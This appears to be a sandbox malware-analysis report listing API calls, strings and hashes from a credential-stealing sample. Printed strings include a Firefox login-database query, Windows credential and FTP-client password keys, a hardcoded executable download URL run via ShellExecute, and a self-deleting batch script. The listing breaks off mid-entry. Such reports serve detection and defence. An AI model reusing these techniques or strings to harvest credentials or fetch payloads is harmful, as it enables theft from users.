                                        • Opcode ID: d1fbfc7de99e8a1c9f02b83199f86e098cebef76abaed47ae6285e4a46ddf08e
                                        • Instruction ID: 0834c845e949aa4d4731b5581efcecee0a3f63d7663d6ae8f589aa7b01491016
                                        • Opcode Fuzzy Hash: d1fbfc7de99e8a1c9f02b83199f86e098cebef76abaed47ae6285e4a46ddf08e
                                        • Instruction Fuzzy Hash: 73412A7290021CAADF219F50CC42FDA7AB9BF08304F4484E9F64475090DBB99AE59FD9
                                        APIs
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BB18
                                        • LocalFree.KERNEL32(00000000,?), ref: 0040BB53
                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB94
                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA2
                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBB0
                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBBE
                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBCC
                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                        • String ID: ftp://$http://$https://
                                        • API String ID: 3968356742-2804853444
                                        • Opcode ID: aecf51c85739bb9039beee7140967baf2a85c31927b49e32ff767d93cc1d15a2
                                        • Instruction ID: 05f63e031c690ac09b10849756e13855a18b746bd5dec6cc88aabe71e4e14f4a
                                        • Opcode Fuzzy Hash: aecf51c85739bb9039beee7140967baf2a85c31927b49e32ff767d93cc1d15a2
                                        • Instruction Fuzzy Hash: A751D63291020DFADF11ABA1ED41FEE7B7AEF04704F50813AF511B11A1DB799A90DB58
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0040880B
                                        • lstrcmpiA.KERNEL32(00414FF5,?), ref: 00408834
                                        • lstrcmpiA.KERNEL32(00414FF7,?), ref: 00408851
                                        • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 004088F8
                                        • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 0040890B
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$\*.*
                                        • API String ID: 3040542784-1692270452
                                        • Opcode ID: 3965ebb162f110cf4f9291f582e9820642276b0733d5a9ae705261ccb80d2748
                                        • Instruction ID: 42ba9e4e03238b903e96c900c4e4fe61deb1c16cbd32061e38acb72b00e4b131
                                        • Opcode Fuzzy Hash: 3965ebb162f110cf4f9291f582e9820642276b0733d5a9ae705261ccb80d2748
                                        • Instruction Fuzzy Hash: AC315071900219AAEF21BF21CD41AED77A9AF04308F5084BFB448B51F2DF7D8AD19A59
                                        APIs
                                          • Part of subcall function 00BA1C70: GetVersionExA.KERNEL32 ref: 00BA1C94
                                        • MessageBoxIndirectA.USER32(00000000), ref: 00BA212A
                                        • MessageBoxExA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA213A
                                        • EndDialog.USER32(00000000,00000000), ref: 00BA2144
                                        • SendDlgItemMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA2154
                                        • ExitProcess.KERNEL32 ref: 00BA215C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: Message$DialogExitIndirectItemProcessSendVersion
                                        • String ID:
                                        • API String ID: 3504329115-0
                                        • Opcode ID: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
                                        • Instruction ID: e237a94bdd837a8066ac5d801f9d199556e68e124c672510adbb66228d11aa58
                                        • Opcode Fuzzy Hash: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
                                        • Instruction Fuzzy Hash: D2213C337AC2026BEB5CEF749D27B7F26D79B06611F42C87EA207CA0D1ED709404465A
                                        APIs
                                        • lstrlenA.KERNEL32(00000000), ref: 0040CD0D
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CD73
                                        • LocalFree.KERNEL32(00000000), ref: 0040CD9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                        • String ID: full address:s:$password 51:b:$username:s:
                                        • API String ID: 2920030623-2945746679
                                        • Opcode ID: 24e5556bb99432440df1035ff8fbdcba4e7bb0ba52b33656ebd5752b605b387f
                                        • Instruction ID: 40a455db09f3bf5b6d636c3d1dac8bf0f1d2c5233aaa4dd17742d86c61909a7d
                                        • Opcode Fuzzy Hash: 24e5556bb99432440df1035ff8fbdcba4e7bb0ba52b33656ebd5752b605b387f
                                        • Instruction Fuzzy Hash: 46413632910109EAEF11ABE1C986BEEBFB5EF44314F10013BE600B11E0D67D5A92DB69
                                        APIs
                                        • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A80A
                                        • lstrlenW.KERNEL32(004163A8,?,?,00000000), ref: 0040A848
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A878
                                        • LocalFree.KERNEL32(00000000), ref: 0040A8AA
                                        • CredFree.ADVAPI32(00000000), ref: 0040A8C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                        • String ID: Microsoft_WinInet_*
                                        • API String ID: 3891647360-439986189
                                        • Opcode ID: a97b6aa37169208cde01b248676f0b91efa0178134f4b94e29171a3a14f4019e
                                        • Instruction ID: 10cc8d598a7a28ed956ec4de8eddf5bcd684f035a39353e3847c60dc5f03db00
                                        • Opcode Fuzzy Hash: a97b6aa37169208cde01b248676f0b91efa0178134f4b94e29171a3a14f4019e
                                        • Instruction Fuzzy Hash: 2F313C72850309EFEF209F84DC05BEEB7B4AB04315F14807AE510B22E0D3B89A95DB5A
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 00BA2504
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BA2519
                                        • UnhandledExceptionFilter.KERNEL32(00BA7130), ref: 00BA2524
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00BA2540
                                        • TerminateProcess.KERNEL32(00000000), ref: 00BA2547
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
                                        • Instruction ID: 31477684e88f4f4d7b12601cd1be02b789d14066a292e1f330abedc49fff2d35
                                        • Opcode Fuzzy Hash: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
                                        • Instruction Fuzzy Hash: 4B21EEB8948604EFD710DF68FD8A6857BE0FB4A320F50505AE90987360EFB05A84EF59
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 0040A964
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
                                        • LocalFree.KERNEL32(00000000), ref: 0040AA4F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                        • String ID:
                                        • API String ID: 2920030623-0
                                        • Opcode ID: 3ee5b7e1c82f1607e2cda8437f5978eb28178e04f6d36369c44489f08c675a6e
                                        • Instruction ID: 98b09c9b8ad4cb5ed3de69e9071a18d604a0b9919213ab1aa4454306ae46edfb
                                        • Opcode Fuzzy Hash: 3ee5b7e1c82f1607e2cda8437f5978eb28178e04f6d36369c44489f08c675a6e
                                        • Instruction Fuzzy Hash: 2D31D6B37002089BEF209EA4D944BCEB765FB85360F508433E951B62C0D27C9A92CF5E
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404372
                                        • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040438E
                                        • FreeSid.ADVAPI32(?), ref: 004043A2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: fc0c390258a6503db38d0b7472b0550f8c88649682f8a07c647c536adc60a40c
                                        • Instruction ID: 8546a107585b055a91af00dfa413d36e2a1cedd3d7a951e8ccb16bcb1636ec09
                                        • Opcode Fuzzy Hash: fc0c390258a6503db38d0b7472b0550f8c88649682f8a07c647c536adc60a40c
                                        • Instruction Fuzzy Hash: D5115270604248EEEB11CBA4DC1EBDE7BF4AB5030AF0981B5D550EB2E1D3B9E508C75A
                                        APIs
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
                                        • LocalFree.KERNEL32(00000000), ref: 0040429D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataFreeLocalUnprotect
                                        • String ID:
                                        • API String ID: 1561624719-0
                                        • Opcode ID: ed0a268b04ac00425a08792f81ecd71c415b08711814e6f8b313b0fdd32c7a25
                                        • Instruction ID: 5bc2afcd4b249a915aab4cd4489415848167be074806362298e41e3550db9fc6
                                        • Opcode Fuzzy Hash: ed0a268b04ac00425a08792f81ecd71c415b08711814e6f8b313b0fdd32c7a25
                                        • Instruction Fuzzy Hash: DB11F875A04208EBDF118F95DC84BDEBBB5FB84350F1484BABA15662D0C378AA50CB58
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00BA235C), ref: 00BA359D
                                        • __mtterm.LIBCMT ref: 00BA35A9
                                          • Part of subcall function 00BA32E2: DecodePointer.KERNEL32(FFFFFFFF,00BA370B,?,00BA235C), ref: 00BA32F3
                                          • Part of subcall function 00BA32E2: TlsFree.KERNEL32(FFFFFFFF,00BA370B,?,00BA235C), ref: 00BA330D
                                          • Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(00000000,00000000,00008DD4,?,00BA370B,?,00BA235C), ref: 00BA3A73
                                          • Part of subcall function 00BA32E2: _free.LIBCMT ref: 00BA3A76
                                          • Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(FFFFFFFF,00008DD4,?,00BA370B,?,00BA235C), ref: 00BA3A9D
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BA35BF
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BA35CC
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BA35D9
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BA35E6
                                        • TlsAlloc.KERNEL32(?,00BA235C), ref: 00BA3636
                                        • TlsSetValue.KERNEL32(00000000,?,00BA235C), ref: 00BA3651
                                        • __init_pointers.LIBCMT ref: 00BA365B
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA366C
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3679
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3686
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3693
                                        • DecodePointer.KERNEL32(00BA3466,?,00BA235C), ref: 00BA36B4
                                        • __calloc_crt.LIBCMT ref: 00BA36C9
                                        • DecodePointer.KERNEL32(00000000,?,00BA235C), ref: 00BA36E3
                                        • GetCurrentThreadId.KERNEL32 ref: 00BA36F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3698121176-3819984048
                                        • Opcode ID: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
                                        • Instruction ID: 4f11bc8fa9b280f1c531659781a39aa058b0c47e0b1ee7d7505a2adfcfd418cf
                                        • Opcode Fuzzy Hash: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
                                        • Instruction Fuzzy Hash: 2E311871D4C210AAC761AF78AC0AA1A3FE4FB57B61B1045AAF414D32B4EF748940CF69
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                        • API String ID: 0-1526611526
                                        • Opcode ID: 7316a092c6bce59c1a320b3b349cebaea51de05526983b00ea3a9117e995390f
                                        • Instruction ID: f88e77904a974f6789c6144af8938d399e0414cbc12fc8393a9b67a2f52b948b
                                        • Opcode Fuzzy Hash: 7316a092c6bce59c1a320b3b349cebaea51de05526983b00ea3a9117e995390f
                                        • Instruction Fuzzy Hash: 4F910671D00209BADF11AFA2DC46BEEBEB1AF04348F20443BF410711E2DBB94E919B59
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • GetModuleFileNameA.KERNEL32(00000000,00000105,00000104,00000105,00000105), ref: 0040FE25
                                        • GetTempPathA.KERNEL32(00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE37
                                        • lstrcatA.KERNEL32(00000105,abcd.bat,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE4B
                                        • CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE64
                                        • lstrcpyA.KERNEL32(00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE77
                                        • StrRChrIA.SHLWAPI(00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105), ref: 0040FE83
                                        • lstrcpyA.KERNEL32(00000001,abcd.bat,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105), ref: 0040FE93
                                        • CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000), ref: 0040FEAA
                                        • lstrlenA.KERNEL32( :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FEBA
                                        • CloseHandle.KERNEL32(00000104,00000000, :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105), ref: 0040FED1
                                        • wsprintfA.USER32 ref: 0040FEE8
                                        • LoadLibraryA.KERNEL32(shell32.dll), ref: 0040FEF5
                                        • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0040FF04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Createlstrcpy$AddressAllocCloseHandleLibraryLoadLocalModuleNamePathProcTemplstrcatlstrlenwsprintf
                                        • String ID: :ijk del %1 if exist %1 goto ijk del %0 $ "%s" $ShellExecuteA$abcd.bat$open$shell32.dll
                                        • API String ID: 1579379117-2346035512
                                        • Opcode ID: 6ff2742ab80524d4d8df907e34ab60c14ef88219d1e76b9ce8b3f2491aecbe1c
                                        • Instruction ID: 2260d78383d4395a4199572d39aba8ac31190bab2c2c27c71c8886b9e3b055a2
                                        • Opcode Fuzzy Hash: 6ff2742ab80524d4d8df907e34ab60c14ef88219d1e76b9ce8b3f2491aecbe1c
                                        • Instruction Fuzzy Hash: AE313E31F442097AEF2177A28C03FEE7922AB44B48F2484377620B55E6DAF95A915A1C
                                        APIs
                                          • Part of subcall function 00401770: GetHGlobalFromStream.OLE32(?,?), ref: 0040177D
                                          • Part of subcall function 00401770: GlobalLock.KERNEL32(?), ref: 00401794
                                          • Part of subcall function 00401770: GlobalUnlock.KERNEL32(?), ref: 004017AC
                                        • wsprintfA.USER32 ref: 0040FC4E
                                        • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FCC1
                                        • GetTickCount.KERNEL32 ref: 0040FCD9
                                        • wsprintfA.USER32 ref: 0040FCEB
                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FCFC
                                        • lstrlenA.KERNEL32(true,?,00000000), ref: 0040FD64
                                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FD8D
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Globallstrlen$wsprintf$CountCreateDirectoryExecuteFromLockPathShellStreamTempTickUnlocklstrcatlstrcpy
                                        • String ID: %02X$%d.exe$MZ$http://ftp.approachit.com/jZy.exe$open$true
                                        • API String ID: 3844566713-121843707
                                        • Opcode ID: 53601dfb8e76c8308079200fdef8aab2425115c71132ffc9e050d7584662b6bc
                                        • Instruction ID: 279c515f677962acfde49643876b8489b39d673ed7fb2dc107904c3fec3fc2cb
                                        • Opcode Fuzzy Hash: 53601dfb8e76c8308079200fdef8aab2425115c71132ffc9e050d7584662b6bc
                                        • Instruction Fuzzy Hash: AC414C71904228AADB30ABA18C46FEEB7B9AF05305F1045F7B548B14E1D6BC8EC49F59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                        • API String ID: 0-3560805513
                                        • Opcode ID: be895cb03f50841b83d8b00f3619420343b3a876b762255af2831097d856b825
                                        • Instruction ID: c28b628ff21c7aed5412b5d5122e17c4509d94f0c1cd4b3173a2c6c0672043ef
                                        • Opcode Fuzzy Hash: be895cb03f50841b83d8b00f3619420343b3a876b762255af2831097d856b825
                                        • Instruction Fuzzy Hash: FB510770940109BADF11ABA5CC06EEE7E75AF04348F10847BB515B01E3DBBD8EA0AA5D
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • wsprintfA.USER32 ref: 0040AAD5
                                        • wsprintfA.USER32 ref: 0040AAE8
                                        • wsprintfA.USER32 ref: 0040AAFB
                                        • wsprintfA.USER32 ref: 0040AB0E
                                        • wsprintfA.USER32 ref: 0040AB21
                                        • wsprintfA.USER32 ref: 0040AB34
                                        • wsprintfA.USER32 ref: 0040AB47
                                          • Part of subcall function 0040A94F: lstrlenA.KERNEL32(?), ref: 0040A964
                                          • Part of subcall function 0040A94F: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
                                          • Part of subcall function 0040A94F: LocalFree.KERNEL32(00000000), ref: 0040AA4F
                                          • Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                        • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                        • API String ID: 3846021373-1012938452
                                        • Opcode ID: 8c1b022f5ccfba05b787536624b35503ed059e4f9a4c2e1713a6aa9687add195
                                        • Instruction ID: 57a821cb36afe422aef635e17fbfd16116dcaba8d7923e0d6217dc199a0e1aca
                                        • Opcode Fuzzy Hash: 8c1b022f5ccfba05b787536624b35503ed059e4f9a4c2e1713a6aa9687add195
                                        • Instruction Fuzzy Hash: FB616272C00209BBEF12BFA1DC86EEDBA72AF04304F54853AF514741B1D77A5A60EB59
                                        APIs
                                          • Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
                                          • Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125
                                          • Part of subcall function 0040A12E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A16A
                                          • Part of subcall function 0040A12E: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A173
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F3B9
                                        • lstrcmpiA.KERNEL32(?,identification), ref: 0040F439
                                        • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F44E
                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F471
                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F490
                                        • lstrcmpiA.KERNEL32(?,identities), ref: 0040F4AF
                                        • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F510
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                        • API String ID: 636431001-4287852900
                                        • Opcode ID: b2b8908ddc6ce3047a6c7e1c13482f2f06bf3fe4a80a454f09d26ee9d9d98aae
                                        • Instruction ID: 5789a66e29a2bd99591765fce3debc4fe34dfaeb6171cd2c536a7f248842e80a
                                        • Opcode Fuzzy Hash: b2b8908ddc6ce3047a6c7e1c13482f2f06bf3fe4a80a454f09d26ee9d9d98aae
                                        • Instruction Fuzzy Hash: 5141497190021DBAEF219F50CD42FDA7B79BB05304F0041BAFA0875192DB799AE99FA4
                                        APIs
                                        • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402BBC
                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402BE0
                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402C0A
                                        • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402C22
                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402C2F
                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402C50
                                        • CloseHandle.KERNEL32(?), ref: 00402C75
                                        • CloseHandle.KERNEL32(?,?), ref: 00402C7D
                                        • CloseHandle.KERNEL32(?), ref: 00402C87
                                        • Process32Next.KERNEL32(?,00000128), ref: 00402C99
                                        • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402CA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                        • String ID: explorer.exe
                                        • API String ID: 3144406365-3187896405
                                        • Opcode ID: a977a2671e64b89284aa4797132b113ab425a37900813f33374cc771d936be96
                                        • Instruction ID: e9f66233cd172950b9059afcd66855f90edcf6bbd480f39b5c1ee9b837742415
